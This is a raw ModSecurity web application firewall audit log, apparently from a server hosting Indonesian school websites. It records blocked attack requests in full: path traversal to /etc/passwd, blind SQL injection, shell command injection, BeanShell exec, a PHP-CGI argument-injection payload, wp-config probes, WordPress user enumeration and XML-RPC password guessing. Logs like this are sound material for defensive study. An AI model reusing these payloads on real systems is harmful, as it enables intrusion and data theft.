Version/17.2 Safari/605.1.15 --fd17a43c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd17a43c-E-- --fd17a43c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||103.236.140.4|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745054520285911 1867 (- - -) Stopwatch2: 1745054520285911 1867; combined=604, p1=389, p2=188, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd17a43c-Z-- --77cc837c-A-- [19/Apr/2025:16:22:01 +0700] aANrOQ6cTFSgLAHl7PrJ-wAAAAU 103.236.140.4 56794 103.236.140.4 8181 --77cc837c-B-- GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27-- HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.175.188 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.175.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0 --77cc837c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77cc837c-E-- --77cc837c-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||103.236.140.4|F|2"] [data "Matched Data: WAITFOR DELAY found within REQUEST_URI: /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745054521252884 4160 (- - -) Stopwatch2: 1745054521252884 4160; combined=2544, p1=563, p2=1940, p3=0, p4=0, p5=41, sr=93, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77cc837c-Z-- --d11cab3b-A-- [19/Apr/2025:16:22:01 +0700] aANrOXNa4dA2HllpK_N98AAAAIw 103.236.140.4 56796 103.236.140.4 8181 --d11cab3b-B-- POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.175.188 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.175.188 X-Forwarded-Proto: https Connection: close Content-Length: 25 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/616.19 (KHTML, like Gecko) Version/17.7.17 Safari/616.19 Content-Type: application/x-www-form-urlencoded --d11cab3b-C-- type='|cat /etc/passwd||' --d11cab3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d11cab3b-E-- --d11cab3b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||103.236.140.4|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /webadm/?q=moni_detail.do&action=gragh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745054521256166 1707 (- - -) Stopwatch2: 1745054521256166 1707; combined=647, p1=385, p2=229, p3=0, p4=0, p5=32, sr=107, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d11cab3b-Z-- --7ab03325-A-- [19/Apr/2025:16:22:01 +0700] aANrOevDiFC_ir7MDwbkcAAAAEw 103.236.140.4 56802 103.236.140.4 8181 --7ab03325-B-- POST /bsh.servlet.BshServlet HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.175.188 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.175.188 X-Forwarded-Proto: https Connection: close Content-Length: 58 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0 Content-Type: application/x-www-form-urlencoded --7ab03325-C-- bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw --7ab03325-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ab03325-E-- --7ab03325-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||103.236.140.4|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /bsh.servlet.BshServlet"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745054521326316 2074 (- - -) Stopwatch2: 1745054521326316 2074; combined=653, p1=431, p2=187, p3=0, p4=0, p5=35, sr=110, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ab03325-Z-- --9f29623f-A-- [19/Apr/2025:16:22:03 +0700] aANrO-vDiFC_ir7MDwbkdwAAAEE 103.236.140.4 56906 103.236.140.4 8181 --9f29623f-B-- GET /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.175.188 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.175.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 --9f29623f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f29623f-E-- --9f29623f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||103.236.140.4|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745054523283217 2003 (- - -) Stopwatch2: 1745054523283217 2003; combined=513, p1=379, p2=107, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f29623f-Z-- --133b997e-A-- [19/Apr/2025:16:48:37 +0700] aANxdevDiFC_ir7MDwb4AQAAAEY 103.236.140.4 52056 103.236.140.4 8181 --133b997e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.24.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.24.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36 Accept: */* Accept-Language: en-US,en;q=0.5 --133b997e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --133b997e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745056117946941 2400 (- - -) Stopwatch2: 1745056117946941 2400; combined=1174, p1=408, p2=738, p3=0, p4=0, p5=28, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --133b997e-Z-- --7f604d4a-A-- [19/Apr/2025:18:19:11 +0700] aAOGr3Na4dA2HllpK_PYGgAAAJc 103.236.140.4 54852 103.236.140.4 8181 --7f604d4a-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 188.166.52.74 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Accept: */* User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force Cookie: X-Forwarded-For: 188.166.52.74 Accept-Encoding: gzip X-Varnish: 129014527 --7f604d4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7f604d4a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745061551571822 735 (- - -) Stopwatch2: 1745061551571822 735; combined=254, p1=225, p2=0, p3=0, p4=0, p5=29, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f604d4a-Z-- --c62a3236-A-- [19/Apr/2025:18:19:25 +0700] aAOGvevDiFC_ir7MDwY5ZQAAAEY 103.236.140.4 56328 103.236.140.4 8181 --c62a3236-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.15.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.15.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c62a3236-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c62a3236-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745061565763054 2195 (- - -) Stopwatch2: 1745061565763054 2195; combined=954, p1=354, p2=579, p3=0, p4=0, p5=21, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c62a3236-Z-- --747dc95c-A-- [19/Apr/2025:18:19:30 +0700] aAOGwg6cTFSgLAHl7PolmwAAAAA 103.236.140.4 56806 103.236.140.4 8181 --747dc95c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.15.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.15.74 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --747dc95c-C-- demo.sayHello --747dc95c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --747dc95c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745061570302892 5355 (- - -) Stopwatch2: 1745061570302892 5355; combined=4004, p1=509, p2=3280, p3=27, p4=30, p5=94, sr=65, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --747dc95c-Z-- --2e34d641-A-- [19/Apr/2025:18:35:51 +0700] aAOKlw6cTFSgLAHl7PpAZgAAAAQ 103.236.140.4 42948 103.236.140.4 8181 --2e34d641-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.119 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2e34d641-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e34d641-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745062551217453 2751 (- - -) Stopwatch2: 1745062551217453 2751; combined=1258, p1=445, p2=781, p3=0, p4=0, p5=32, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e34d641-Z-- --1c828f03-A-- [19/Apr/2025:18:35:57 +0700] aAOKnXNa4dA2HllpK_PuxQAAAIY 103.236.140.4 43552 103.236.140.4 8181 --1c828f03-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.119 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1c828f03-C-- demo.sayHello --1c828f03-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c828f03-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745062557030642 5715 (- - -) Stopwatch2: 1745062557030642 5715; combined=4263, p1=543, p2=3488, p3=32, p4=31, p5=97, sr=75, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c828f03-Z-- --9b2d8e4b-A-- [19/Apr/2025:18:42:13 +0700] aAOMFQ6cTFSgLAHl7PpKqgAAAAw 103.236.140.4 52618 103.236.140.4 8181 --9b2d8e4b-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --9b2d8e4b-C-- --9b2d8e4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b2d8e4b-E-- --9b2d8e4b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745062933512660 4481 (- - -) Stopwatch2: 1745062933512660 4481; combined=3101, p1=536, p2=2531, p3=0, p4=0, p5=34, sr=62, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b2d8e4b-Z-- --2eb4ce39-A-- [19/Apr/2025:19:06:07 +0700] aAORr3Na4dA2HllpK_MXVQAAAJc 103.236.140.4 49918 103.236.140.4 8181 --2eb4ce39-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.251 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2eb4ce39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2eb4ce39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745064367321049 3585 (- - -) Stopwatch2: 1745064367321049 3585; combined=1827, p1=560, p2=1235, p3=0, p4=0, p5=32, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2eb4ce39-Z-- --41b93b44-A-- [19/Apr/2025:19:06:14 +0700] aAORtkruoUXZj665VUGIwgAAAMw 103.236.140.4 50538 103.236.140.4 8181 --41b93b44-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.251 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --41b93b44-C-- demo.sayHello --41b93b44-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --41b93b44-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745064374440766 5969 (- - -) Stopwatch2: 1745064374440766 5969; combined=4429, p1=621, p2=3550, p3=33, p4=62, p5=97, sr=69, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41b93b44-Z-- --921b6d25-A-- [19/Apr/2025:19:53:31 +0700] aAOcy-vDiFC_ir7MDwbIGwAAAEM 103.236.140.4 45416 103.236.140.4 8181 --921b6d25-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 216 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --921b6d25-C-- wp.getUsersBlogs admin 12345 --921b6d25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --921b6d25-E-- --921b6d25-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067211736988 4695 (- - -) Stopwatch2: 1745067211736988 4695; combined=3081, p1=464, p2=2487, p3=0, p4=0, p5=77, sr=59, sw=53, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --921b6d25-Z-- --1c5f5d73-A-- [19/Apr/2025:19:54:32 +0700] aAOdCHNa4dA2HllpK_Ne8QAAAIQ 103.236.140.4 51012 103.236.140.4 8181 --1c5f5d73-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1c5f5d73-C-- wp.getUsersBlogs admin r007p455w0rd --1c5f5d73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c5f5d73-E-- --1c5f5d73-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067272153177 4926 (- - -) Stopwatch2: 1745067272153177 4926; combined=3460, p1=446, p2=2855, p3=0, p4=0, p5=95, sr=85, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c5f5d73-Z-- --a7cc143f-A-- [19/Apr/2025:19:55:32 +0700] aAOdROvDiFC_ir7MDwbKjgAAAE0 103.236.140.4 56324 103.236.140.4 8181 --a7cc143f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a7cc143f-C-- wp.getUsersBlogs admin admin@2019 --a7cc143f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7cc143f-E-- --a7cc143f-H-- Message: Access denied with code 403 (phase 